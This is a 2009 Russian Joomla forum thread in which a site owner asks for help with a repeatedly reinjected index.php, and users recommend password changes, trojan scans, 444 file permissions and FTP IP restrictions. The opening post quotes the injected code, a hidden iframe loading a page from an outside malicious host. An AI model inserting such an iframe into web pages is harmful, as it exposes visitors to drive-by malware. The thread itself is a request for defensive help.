0 Пользователей и 1 Гость просматривают эту тему.
  • 17 Ответов
  • 5224 Просмотров
*

AndreiFX

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Взломали сайт
« : 01.08.2009, 09:19:30 »
Видимо взломали сайт.
Дописывают в index.php след. строчку:
Код
<iframe src="http://x8m.ru:8080/index.php" width=138 height=168 style="visibility: hidden"></iframe>

Сайт соответственно не грузится и выдает ошибку:
Parse error: syntax error, unexpected '<' in /home/host900124/nojuris.ru/htdocs/www/index.php on line 91

Удаляю эту строчку-все начинает нормально работать, но через некоторое время опять строчка дописывается.
Подскажите плиз, как это устранить?
Если к index.php доступ вообще закрыть, поможет?
*

profiX0808

  • Захожу иногда
  • 497
  • 70 / 0
Re: Взломали сайт
« Ответ #1 : 01.08.2009, 10:04:15 »
нужно смотреть в первую очередь на сторонние расширения, возможно в них есть уязвимость...
проверить "комп" на наличие вирусов...
сменить "всевозможные" пароли...
пользоваться поиском на данном форуме (много подобных тем - там есть что почерпнуть ;) )
*

AndreiFX

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Взломали сайт
« Ответ #2 : 03.08.2009, 20:51:14 »
Спасибо за ответ.
скажите, а если я index.php свой залью туда и поставлю на него права доступа 444 ? Сработает?
*

oppo

  • Захожу иногда
  • 365
  • 82 / 8
  • ΨΨΨ я - УКРАЇНЕЦЬ
Re: Взломали сайт
« Ответ #3 : 03.08.2009, 22:01:45 »
Спасибо за ответ.
скажите, а если я index.php свой залью туда и поставлю на него права доступа 444 ? Сработает?
как правило *портяться* не только index.php а файлы шаблона , админки и прч.
тема подымалась не раз - поищите на форуме
права 644
*

ShadowXak

  • Завсегдатай
  • 1602
  • 162 / 6
  • no more programming
Re: Взломали сайт
« Ответ #4 : 04.08.2009, 06:31:02 »
права 644
с такими правами у скрипта виря есть право на запись, т.к. он выполняется на стороне сервака, так что:

простое решение установить на все файлы index.php(html), default.php и configuration.php - права 444 и все пройдет
+ закрыть доступ к ФТП совсех IP, кроме своего!

(проблема такая была 1,5 года назад, сейчас ее более нету)
*

pedrosoft

  • Захожу иногда
  • 367
  • 113 / 7
Re: Взломали сайт
« Ответ #5 : 04.08.2009, 12:17:19 »
да скорее всего у AndreiFX на компьютере троян, который угнал пароли из фтп-клиента и теперь хулиганит
Интернет Хостинг Центр: отличные цены, лучшее качество, расположение в дата-центре «Оверсан-Меркурий»
*

lsk

  • Захожу иногда
  • 362
  • 13 / 5
Re: Взломали сайт
« Ответ #6 : 04.08.2009, 12:42:20 »
+ закрыть доступ к ФТП совсех IP, кроме своего!
как это сделать?
*

era

  • Администратор
  • 1587
  • 391 / 5
  • В туалете лучше быть пользователем, чем админом.
*

bestel

  • Захожу иногда
  • 62
  • 5 / 1
  • Let the metal flow!...
Re: Взломали сайт
« Ответ #8 : 04.08.2009, 13:04:50 »
да скорее всего у AndreiFX на компьютере троян, который угнал пароли из фтп-клиента и теперь хулиганит
Так и есть. Вывод: больше не хранить пароли ни в одном ftp-клиенте.
*

ShadowXak

  • Завсегдатай
  • 1602
  • 162 / 6
  • no more programming
Re: Взломали сайт
« Ответ #9 : 04.08.2009, 15:05:40 »
Так и есть. Вывод: больше не хранить пароли ни в одном ftp-клиенте.
если стоит ограничение по IP на допуск к ФТП и права на файлы индекса и дефаулт, а так же конфиг стоят 444, то хранить пароли можно (не рекомендуется, но можно!!!)
как это сделать?
спросить у хостера, а вдруг у него такая услуга есть :)
*

bestel

  • Захожу иногда
  • 62
  • 5 / 1
  • Let the metal flow!...
Re: Взломали сайт
« Ответ #10 : 04.08.2009, 16:31:00 »
если стоит ограничение по IP на допуск к ФТП и права на файлы индекса и дефаулт, а так же конфиг стоят 444, то хранить пароли можно (не рекомендуется, но можно!!!)спросить у хостера, а вдруг у него такая услуга есть :)

Если нормальный хостинг, то там есть cPanel, ниче спрашивать не надо, наше - всьо :)
*

lsk

  • Захожу иногда
  • 362
  • 13 / 5
Re: Взломали сайт
« Ответ #11 : 04.08.2009, 17:04:08 »
Если нормальный хостинг, то там есть cPanel, ниче спрашивать не надо, наше - всьо :)
Удиви, дай инструкцию как в cPanel ограничить доступ к FTP только для 1 IP.
*

ShadowXak

  • Завсегдатай
  • 1602
  • 162 / 6
  • no more programming
Re: Взломали сайт
« Ответ #12 : 04.08.2009, 17:47:02 »
Удиви, дай инструкцию как в cPanel ограничить доступ к FTP только для 1 IP.
У меня вот так - смотри вложение ::)

[вложение удалено Администратором]
*

ShadowXak

  • Завсегдатай
  • 1602
  • 162 / 6
  • no more programming
Re: Взломали сайт
« Ответ #13 : 04.08.2009, 17:48:55 »
Если нормальный хостинг, то там есть cPanel, ниче спрашивать не надо, наше - всьо :)
Иногда нужно именно спрашивать, дабы я на 1 хостере видел данную услугу платную 100 руб единоразово :)
*

lsk

  • Захожу иногда
  • 362
  • 13 / 5
Re: Взломали сайт
« Ответ #14 : 04.08.2009, 23:05:49 »
Красиво!
У меня cPanel есть, а возможности такой нет. Хостер подтвердил.
Есть еще какие варианты?
*

ShadowXak

  • Завсегдатай
  • 1602
  • 162 / 6
  • no more programming
Re: Взломали сайт
« Ответ #15 : 04.08.2009, 23:31:36 »
чем не подходит вариант с правами?
вири пока не умеют менять права (почему то не умеют, писал бы я, объязательно предусмотрел такой вариант ::) )
« Последнее редактирование: 06.08.2009, 13:58:39 от ShadowXak »
*

Valiks

  • Захожу иногда
  • 108
  • 6 / 3
Re: Взломали сайт
« Ответ #16 : 06.11.2009, 03:06:38 »
У меня вопрос по блокировке IP
В моей cPanel  стоит возможность заблокировать определёггые IP, а вот, чтобы дать доступ только определённым IP, такой опции нет. Но, как я понял, если ввести в .htaccess запреты на определённые IP, то они автоматом появляются и в cPanel-и. Следовательно, можно через .htaccess сделать и обратное,- задать права доступа только определённому IP?

Правильно ли я думаю или нет? И, если "да", не подскажет ли кто-то как и что надо написать в .htaccess , учитывая тот факт, что у меня от провайдера динамическое IP, меняющееся в определённом диапазоне. Как ввести диапазон IP? Или, лучше купить себе собственное IP? Но, до того времени, следовало бы заблокировать сторонний доступ по диапазону. А потом думать дальше, что делать. Помогите, подскажите что и как ввести в .htaccess?
*

ShadowXak

  • Завсегдатай
  • 1602
  • 162 / 6
  • no more programming
Re: Взломали сайт
« Ответ #17 : 06.11.2009, 06:40:38 »
чем не подходит вариант с правами?
вири пока не умеют менять права (почему то не умеют, писал бы я, объязательно предусмотрел такой вариант ::) )
чем не подходит?
по .htaccess задайте вопрос поддержек хостинга.
сейчас ставлю права 444 на файлы описанные выше и все гуд [плююся]!
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 388
Последний ответ 31.03.2024, 16:14:32
от SeBun
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 1661
Последний ответ 05.11.2021, 21:47:31
от wishlight
Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

Ответов: 0
Просмотров: 646
Последний ответ 29.08.2020, 00:25:24
от cntrl
Безопасный вход на сайт Joomla и админка

Автор jm

Ответов: 9
Просмотров: 1464
Последний ответ 19.07.2020, 23:57:17
от wishlight
[Руководство] Как защитить сайт на версии 1.5 (не поддерживается разработчиками)

Автор flyingspook

Ответов: 13
Просмотров: 5933
Последний ответ 08.01.2020, 12:52:55
от winstrool